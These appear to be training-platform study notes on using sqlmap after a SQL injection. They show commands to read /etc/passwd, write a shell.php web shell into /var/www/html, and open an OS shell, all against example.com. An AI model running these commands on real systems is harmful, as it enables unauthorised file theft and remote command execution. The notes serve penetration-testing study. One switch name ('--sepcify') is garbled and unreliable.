File Read
To read files, DB user must have the privilege to LOAD DATA
and INSERT
.
Most likely, we will need DBA to read data.
To check for DBA privilege, we use --is-dba
switch:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
...SNIP...
current user is DBA: True
[*] ending @ 17:31:56 /2020-11-19
We can read files using --file-read
option:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
File Write
Most of the time, we won’t be able to write a file.
We need DBA’s to be able to write files.
We can write files as such:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
OS Command Execution
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --os-shell
If we know the type of SQL injection we can specify using --sepcify
switch:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E